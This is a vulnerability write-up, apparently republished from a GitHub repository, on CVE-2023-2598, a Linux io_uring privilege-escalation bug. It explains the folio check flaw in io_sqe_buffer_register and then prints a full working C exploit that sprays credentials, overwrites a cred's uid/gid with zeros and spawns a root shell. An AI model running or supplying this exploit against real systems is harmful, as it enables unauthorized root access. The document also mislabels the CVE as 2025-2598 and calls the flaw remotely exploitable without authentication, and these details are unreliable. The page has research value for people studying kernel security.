Linux io_uring 权限提升漏洞

漏洞信息

漏洞名称: Linux io_uring 权限提升漏洞

漏洞编号:

  • CVE: CVE-2023-2598

漏洞类型: 权限提升

漏洞等级: 高危

漏洞描述: io_uring是Linux内核中的一个系统调用接口,支持几乎所有系统调用,不仅限于最初的read()和write()。它允许应用程序异步地启动系统调用。该漏洞存在于io_sqe_buffer_register函数中,该函数负责虚拟页面和物理地址的映射。漏洞的根源在于逻辑错误,即检查页面是否来自同一folio时,未验证它们是否连续。这可能导致同一页面被多次映射,从而绕过检查。攻击者可以利用此漏洞进行权限提升,获取root权限。该漏洞的影响包括远程代码执行和数据泄露,且无需认证即可被利用。由于io_uring是Linux内核的一部分,广泛用于各种Linux发行版中,因此该漏洞的影响范围广泛。

产品厂商: Linux

产品名称: io_uring

来源: https://github.com/SpongeBob-369/CVE-2023-2598

类型: CVE-2023:github search

仓库文件

  • .vscode
  • README.md
  • bzImage
  • images
  • my_exp
  • my_exploit.c
  • rootfs
  • rootfs_new.cpio
  • run.sh

来源概述

CVE-2025-2598

what’s io_uring?

io_uring is a system call interface for Linux. It has supported almost all system call so far, not only read() and write initially. It enables an application to initiate system calls that can be performed asynchronously.

Submission and Completion Queues

At the core of every io_uring implementation sit two ring buffers - the submission queue(SQ) and the completion queue(CQ). Those ring buffers are shared between application and kernel.

We can get a submission queue entry(SQE) which describing a syscall you want to be performed by io_uring_get_sqe . The application then performs an io_uring_enter syscall to effectively tell the kernel that there is work waiting to be done in the submission queue.

After the kernel performs the operation it puts a Completion Queue Entry (CQE) into the completion queue ring buffer which can then be consumed by the application.

Vulnerability

The function io_sqe_buffer_register implements the mapping of virtual pages and physical addresses.

We should clarify some concepts first.

The application initiates a request for a buffer by io_uring_register. The call chain is as follows:

io_uring_register_buffers->io_uring_register->io_sqe_buffers_register

The source code of function io_sqe_buffers_register is as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
unsigned int nr_args, u64 __user *tags)
{
struct page *last_hpage = NULL;
struct io_rsrc_data *data;
int i, ret;
struct iovec iov;

BUILD_BUG_ON(IORING_MAX_REG_BUFFERS >= (1u << 16));

if (ctx->user_bufs)
return -EBUSY;
if (!nr_args || nr_args > IORING_MAX_REG_BUFFERS)
return -EINVAL;
ret = io_rsrc_node_switch_start(ctx);
if (ret)
return ret;
ret = io_rsrc_data_alloc(ctx, io_rsrc_buf_put, tags, nr_args, &data);
if (ret)
return ret;
ret = io_buffers_map_alloc(ctx, nr_args);
if (ret) {
io_rsrc_data_free(data);
return ret;
}

for (i = 0; i < nr_args; i++, ctx->nr_user_bufs++) {
if (arg) {
ret = io_copy_iov(ctx, &iov, arg, i);
if (ret)
break;
ret = io_buffer_validate(&iov);
if (ret)
break;
} else {
memset(&iov, 0, sizeof(iov));
}

if (!iov.iov_base && *io_get_tag_slot(data, i)) {
ret = -EINVAL;
break;
}

ret = io_sqe_buffer_register(ctx, &iov, &ctx->user_bufs[i],
&last_hpage);
if (ret)
break;
}

WARN_ON_ONCE(ctx->buf_data);

ctx->buf_data = data;
if (ret)
__io_sqe_buffers_unregister(ctx);
else
io_rsrc_node_switch(ctx, NULL);
return ret;
}

In this function, we will run into io_sqe_buffer_register. And we will find a logical bug. The source code of function io_sqe_buffer_register is as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
static int io_sqe_buffer_register(struct io_ring_ctx *ctx, struct iovec *iov,
struct io_mapped_ubuf **pimu,
struct page **last_hpage)
{
struct io_mapped_ubuf *imu = NULL;
struct page **pages = NULL;
unsigned long off;
size_t size;
int ret, nr_pages, i;
struct folio *folio = NULL;

*pimu = ctx->dummy_ubuf;
if (!iov->iov_base)
return 0;

ret = -ENOMEM;
pages = io_pin_pages((unsigned long) iov->iov_base, iov->iov_len,
&nr_pages);
if (IS_ERR(pages)) {
ret = PTR_ERR(pages);
pages = NULL;
goto done;
}

/* If it's a huge page, try to coalesce them into a single bvec entry */
if (nr_pages > 1) {
folio = page_folio(pages[0]);
for (i = 1; i < nr_pages; i++) {
if (page_folio(pages[i]) != folio) {
folio = NULL;
break;
}
}
if (folio) {
folio_put_refs(folio, nr_pages - 1);
nr_pages = 1;
}
}

imu = kvmalloc(struct_size(imu, bvec, nr_pages), GFP_KERNEL);
if (!imu)
goto done;

ret = io_buffer_account_pin(ctx, pages, nr_pages, imu, last_hpage);
if (ret) {
unpin_user_pages(pages, nr_pages);
goto done;
}

off = (unsigned long) iov->iov_base & ~PAGE_MASK;
size = iov->iov_len;
/* store original address for later verification */
imu->ubuf = (unsigned long) iov->iov_base;
imu->ubuf_end = imu->ubuf + iov->iov_len;
imu->nr_bvecs = nr_pages;
*pimu = imu;
ret = 0;

if (folio) {
bvec_set_page(&imu->bvec[0], pages[0], size, off);
goto done;
}
for (i = 0; i < nr_pages; i++) {
size_t vec_len;

vec_len = min_t(size_t, size, PAGE_SIZE - off);
bvec_set_page(&imu->bvec[i], pages[i], vec_len, off);
off = 0;
size -= vec_len;
}
done:
if (ret)
kvfree(imu);
kvfree(pages);
return ret;
}

Here I only mention a few important points.

  1. imu means virtual address/page.
  2. page means physical address/page.
  3. folio means a lot of pages that are continues physically, preventing the situation that when a function is called and its parameter contains a page, but this page belongs to a continuous range of pages, but we are not sure whether to use the whole page or a single page.
  4. struct iovec -> just a structure that describes a buffer, with the start address of the buffer and its length. Nothing more.
  5. An io_mapped_ubuf is a structure that holds the information about a buffer that has been registered to an io_uring instance.
1
2
3
4
5
6
7
struct io_mapped_ubuf {
u64 ubuf; // the address at which the buffer starts
u64 ubuf_end; // the address at which it ends
unsigned int nr_bvecs; // how many bio_vec(s) are needed to address the buffer
unsigned long acct_pages;
struct bio_vec bvec[]; // array of bio_vec(s)
};

The member bio_ver is a struct like iovec but for physical memory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
...
/* If it's a huge page, try to coalesce them into a single bvec entry */
if (nr_pages > 1) { // if more than one page
folio = page_folio(pages[0]); // converts from page to folio
// returns the folio that contains this page
for (i = 1; i < nr_pages; i++) {
if (page_folio(pages[i]) != folio) { // different folios -> not physically contiguous
folio = NULL; // set folio to NULL as we cannot coalesce into a single entry
break;
}
}
if (folio) { // if all the pages are in the same folio
folio_put_refs(folio, nr_pages - 1);
nr_pages = 1; // sets nr_pages to 1 as it can be represented as a single folio page
}
}
...

The code that checks if the pages are from the same folio doesn’t actually check if they are consecutive. It can be the same page mapped multiple times. During the iteration page_folio(page) would return the same folio again and again passing the checks. This is an obvious logic bug. Let’s continue with io_sqe_buffer_register and see what the fallout is.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
...
imu = kvmalloc(struct_size(imu, bvec, nr_pages), GFP_KERNEL);
// allocates imu with an array for nr_pages bio_vec(s)
// bio_vec - a contiguous range of physical memory addresses
// we need a bio_vec for each (physical) page
// in the case of a folio - the array of bio_vec(s) will be of size 1
if (!imu)
goto done;

ret = io_buffer_account_pin(ctx, pages, nr_pages, imu, last_hpage);
if (ret) {
unpin_user_pages(pages, nr_pages);
goto done;
}

off = (unsigned long) iov->iov_base & ~PAGE_MASK;
size = iov->iov_len; // sets the size to that passed by the user!
/* store original address for later verification */
imu->ubuf = (unsigned long) iov->iov_base; // user-controlled
imu->ubuf_end = imu->ubuf + iov->iov_len; // calculates the end based on the length
imu->nr_bvecs = nr_pages; // this would be 1 in the case of folio
*pimu = imu;
ret = 0;

if (folio) { // in case of folio - we need just a single bio_vec (efficiant!)
bvec_set_page(&imu->bvec[0], pages[0], size, off);
goto done;
}
for (i = 0; i < nr_pages; i++) {
size_t vec_len;

vec_len = min_t(size_t, size, PAGE_SIZE - off);
bvec_set_page(&imu->bvec[i], pages[i], vec_len, off);
off = 0;
size -= vec_len;
}
done:
if (ret)
kvfree(imu);
kvfree(pages);
return ret;
}

A single bio_vec is allocated as nr_pages = 1. The size of the buffer that is written in pimu->iov_len and pimu->bvec[0].bv_len is the one passed by the user in iov->iov_len.

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <liburing.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <mqueue.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sched.h>
#include <string.h>

#define CRED_DRAIN 100 // Wait for modifying the cred cache
#define CRED_SPRAY 2000 // Number of clones to spray
#define PAGE_SIZE 0x1000 // Size of a memory page
#define MAX_PAGES 100 // Maximum number of pages to allocate

struct timespec timer = {
.tv_sec = 1145141919,
.tv_nsec = 0,
};

#define COLOR_RED "\033[1;31m"
#define COLOR_GREEN "\033[1;32m"
#define COLOR_RESET "\033[0m"
int check_root_pipe[2];
char bin_sh_str[] = "/bin/sh";
char child_pipe_buf[1];
// char root_str[] = "Finally get root privilege!\n";
char root_str[] = "\033[32m\033[1m[+] Successful to get the root.\n"
"\033[34m[*] Execve root shell now...\033[0m\n";

char *shell_args[] = { bin_sh_str, NULL };

void err_exit(char *buf){
fprintf(stderr, "%s[-]%s : %s%s\n", COLOR_RED, buf, strerror(errno), COLOR_RESET);
exit(-1);
}

void check_ret(int ret,char* buf){
if(ret < 0){
err_exit(buf);
}
}

void log_msg(char *buf){
fprintf(stdout, "[+] %s\n", buf);
}
void log_fail_msg(char *buf){
fprintf(stdout, "[-] %s\n", buf);
};
// clear the cred_cache the system have so that when we fork a subprocess, the credential will create with new buddy_memory
void clear_cred_cache(){
for(int i = 0; i < CRED_DRAIN; i++){
int ret = fork();
if(!ret){
read(check_root_pipe[0],child_pipe_buf,1);
if(getuid()==0){
write(1, root_str, 80);
system("/bin/sh");
}
sleep(100000000);
}
check_ret(ret, "fork fail");
}
}

//clear buddy memory that ord is 0, 1, 2..and so on.
void clear_buddy(){
log_msg("Buddy system cache cleared");
void* page[MAX_PAGES];
for(int i =0; i < MAX_PAGES; i++){
page[i] = mmap(0x60000000 + i * 0x200000UL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
}
for(int i = 0; i < MAX_PAGES; i++){
*(char *)page[i] = 'a';
}
}

__attribute__ ((naked)) long simple_clone(int flags, int (*fn)(void *)){
__asm__ volatile (
" mov r15, rsi\n"
" xor rsi, rsi\n"
" xor rdx, rdx\n"
" xor r10, r10\n"
" xor r8, r8\n"
" xor r9, r9\n"
" mov rax, 56\n"
" syscall\n" //clone()
" cmp rax, 0\n"
" je child_fn\n"
" ret\n" // parent
"child_fn:\n"
" jmp r15\n" // child
);
}



int wait_for_root_fn(void *args){
// Wait for root privilege
__asm__ volatile (
// read(check_root_pipe[0], child_pipe_buf, 1);
" lea rax, [check_root_pipe]\n"
" xor rdi, rdi\n"
" mov edi, dword ptr [rax]\n"
" mov rsi, child_pipe_buf\n"
" mov rdx, 1\n"
" xor rax, rax\n" // read(check_root_pipe[0], child_pipe_buf, 1)
" syscall\n"
" mov rax, 102\n" //getuid()
" syscall\n"
" cmp rax, 0\n"
" jne failed\n"
" mov rdi, 1\n"
" lea rdi, [bin_sh_str]\n"
" lea rsi, [shell_args]\n"
" xor rdx, rdx\n"
" mov rax, 59\n" // execve("/bin/sh", args, NULL)
" syscall\n"
"failed: \n"
" lea rdi, [timer]\n"
" xor rsi, rsi\n"
" mov rax, 35\n"
" syscall\n" // nanosleep(&timer, NULL)
);
return 0;
}



int main(){
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(sched_getcpu(), &set);
if (sched_setaffinity(0, sizeof(set), &set) < 0) {
perror("sched_setaffinity");
exit(EXIT_FAILURE);
}
// clear cred cache
int ret = 0;
// io_uring setup
struct io_uring ring;
struct io_uring_sqe *sqe;
struct io_uring_cqe *cqe;
struct iovec iovec;
// buffer for read/write operations
int memfd;
int rw_fd;
int page_offset = -1;
uint64_t start_addr = 0x800000000;
int nr_pages = 500;
char* rw_buffer;
char buf[1000];
log_msg("Clearing cred cache");
pipe(check_root_pipe);
clear_cred_cache();
log_msg("Clearing buddy system cache");
// Clear buddy system cache (implementation not shown in the original code)
clear_buddy();
log_msg("Setting up io_uring");
check_ret(io_uring_queue_init(8, &ring, 0), "io_uring_setup failed");
// io_uring_register_buffers(&ring, iovec, 1);
log_msg("Preparing buffer for registration");


// Create memfd for io_uring buffer
memfd = memfd_create("io_register_buf", MFD_CLOEXEC);
check_ret(memfd, "memfd_create failed");
rw_fd = memfd_create("read_write_file", MFD_CLOEXEC);
check_ret(rw_fd, "memfd_create failed");

check_ret(fallocate(memfd, 0, 0, 1 * PAGE_SIZE), "memfd fallocate failed");
check_ret(fallocate(rw_fd, 0, 0, 1 * PAGE_SIZE), "rw_fd fallocate failed");

for(int i = 0; i < nr_pages; i++){
check_ret(mmap(start_addr + i * PAGE_SIZE, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd, 0), "mmap failed");
}
// Register buffer for io_uring
log_msg("Registering buffer for io_uring");
iovec.iov_base = start_addr;
iovec.iov_len = nr_pages * PAGE_SIZE;
rw_buffer = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, rw_fd, 0);
if (rw_buffer == MAP_FAILED) {
perror("mmap rw_fd");
exit(EXIT_FAILURE);
}
check_ret(io_uring_register_buffers(&ring, &iovec, 1), "io_uring_register_buffers failed");
// spred cred
log_msg("Spraying credentials");
for(int i = 0; i < CRED_SPRAY; i++){
// check_ret(simple_clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_THREAD | CLONE_SIGHAND, wait_for_root_fn), "clone failed");
check_ret(simple_clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND, wait_for_root_fn), "clone failed");
}

log_msg("Searching for cred that we sprayed");
// Search for the sprayed credentials
for(int i = 0; i < nr_pages; i++){
sqe = io_uring_get_sqe(&ring);
if (sqe == NULL) {
err_exit("io_uring_get_sqe failed");
}
io_uring_prep_write_fixed(sqe, rw_fd, start_addr + i*PAGE_SIZE, PAGE_SIZE, 0, 0);
check_ret(io_uring_submit(&ring), "io_uring_submit failed");
io_uring_wait_cqe(&ring, &cqe);
io_uring_cqe_seen(&ring, cqe);
int uid = ((int *)(rw_buffer))[1];
int gid = ((int *)(rw_buffer))[2];
if(uid == 1000 && gid == 1000){
log_msg("Found the target cred page");
page_offset = i;
break;
}
}
if(page_offset < 0){
log_fail_msg("Not find cred page");
exit(-1);
}
log_msg("Editing cred's uid to 0");
uint32_t* cred = (unsigned int *)rw_buffer;
// cred[0] = 0x2; // Keep usage unchanged
cred[1] = 0x0; // Set uid to 0
cred[2] = 0x0;
cred[3] = 0x0; // Set suid and sgid to 0
cred[4] = 0x0;
cred[5] = 0x0;
cred[6] = 0x0;

sqe = io_uring_get_sqe(&ring);
if(sqe == NULL) {
err_exit("io_uring_get_sqe failed");
}
io_uring_prep_read_fixed(sqe, rw_fd, start_addr + page_offset * PAGE_SIZE, 28, 0, 0);
check_ret(io_uring_submit(&ring), "io_uring_submit failed");
io_uring_wait_cqe(&ring, &cqe);
io_uring_cqe_seen(&ring, cqe);

log_msg("check privilege in child processes");
write(check_root_pipe[1],buf, CRED_SPRAY+CRED_DRAIN);
sleep(100000000);
return 0;
}

The main principle of the above exploit is to exhaust the credentials of the process and occupy as much buddy_memory as possible, so that when we spray the process (credential), the target can be within 500 consecutive pages. In this way, we can find the sprinkled credentials within 500 pages and generate a root shell.


Linux io_uring 权限提升漏洞
http://example.com/2025/07/23/github_386363281/
作者
lianccc
发布于
2025年7月23日
许可协议